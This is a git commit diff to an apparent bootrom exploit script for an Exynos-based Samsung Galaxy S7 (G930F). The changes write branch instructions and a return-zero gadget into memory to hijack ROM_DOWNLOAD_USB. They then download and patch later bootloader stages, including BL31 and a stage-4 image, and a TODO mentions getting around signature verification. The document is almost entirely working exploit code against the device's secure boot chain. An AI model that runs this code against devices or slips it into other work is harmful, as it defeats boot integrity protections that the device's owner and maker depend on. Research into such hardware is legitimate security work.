Boots a patched bl31

2024-08-18 13:55:11 +02:00 · 2024-08-18 13:55:11 +02:00 · 2c20ff6255
commit 2c20ff6255
parent 2d0557c5c7
1 changed files with 41 additions and 20 deletions
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@ -623,36 +623,47 @@ class ExynosDevice():
        # INSERT YOUR BL1 PATCHES HERE
        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
        
+        self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
+        
+        # self.cd.memwrite_region(0x020200a0, p32(DEBUGGER_ADDR))
+        # self.cd.memwrite_region(0x020200d0, p32(DEBUGGER_ADDR))
+        # self.cd.memwrite_region(0x020200b4, p32(DEBUGGER_ADDR))
+        # self.cd.memwrite_region(0x020200a4, p32(DEBUGGER_ADDR))
+        
+        # self.cd.memwrite_region(0x0202297c, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
+        
+        
+        GADGET_RET0 = 0x00000d58
+        # self.cd.memwrite_region(0x20296da , p32(GADGET_RET0))
+        # self.cd.memwrite_region(0x20296da + 4, p32(GADGET_RET0))
+        
        # END
        jump_bl1(DEBUGGER_ADDR)
        
        
        # ==== BL31 ====
        assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
-        
-        self.cd.memwrite_region(self.cd.arch_dbg.state.X0, open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
-        
-        
+    
+        # Download next stage via ROM_DOWNLOAD_USB
        lr = self.cd.arch_dbg.state.LR
        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        self.cd.restore_stack_and_jump(hijacked_fun) # will jump back to debugger after downloading the next stage
        time.sleep(2)
        self.connect_device()
-        
-                
-
-        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()[:0x10])
+        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
        time.sleep(2)
        
        self.usb_read(0x200) # GiAs
        # lr = self.cd.arch_dbg.state.LR
-        self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
-        GADGET_RET0 = 0x00000d58
-        self.cd.memwrite_region(0x020200e4, p32(GADGET_RET0))
+        self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow
+        
+        # TODO patch verification
+        
+        
+        # self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0))
+        
+        
        
-        # ====== PATCHES TO BL31 here! ======
-        # TODO fix not checking signatures
-        # self.cd.memwrite_region(0x02031008, b"ELH")
        # self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        # self.cd.arch_dbg.state.X0 = 0x020347f0
@ -660,6 +671,16 @@ class ExynosDevice():
        # self.cd.restore_stack_and_jump(0x02030464)
        self.cd.restore_stack_and_jump(lr)
        
+        time.sleep(2)
+        self.usb_read(0x200) # GiAs
+        self.cd.memwrite_region(0x02031008, b"ELH")
+        # ====== PATCHES TO BL31 here! ======
+        
+        
+        # Jump BL31
+        self.cd.restore_stack_and_jump(0x02024010)
+        
+        
        time.sleep(2)
        self.connect_device()
        
@ -676,12 +697,12 @@ class ExynosDevice():
        # ==== Stage 4  ====
        stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
        # Patching
-        # stage4_len = len(stage4)
-        # patch_len = len(b"USB RECOVERY MODE")
-        # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE")))
-        # patch_offset = stage4.find(b"USB RECOVERY MODE")
-        # stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:]
-        # assert len(stage4) == stage4_len, "Invalid stage4 length"
+        stage4_len = len(stage4)
+        patch_len = len(b"USB RECOVERY MODE")
+        patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE")))
+        patch_offset = stage4.find(b"USB RECOVERY MODE")
+        stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:]
+        assert len(stage4) == stage4_len, "Invalid stage4 length"
        self.send_normal_stage(stage4)
        time.sleep(2)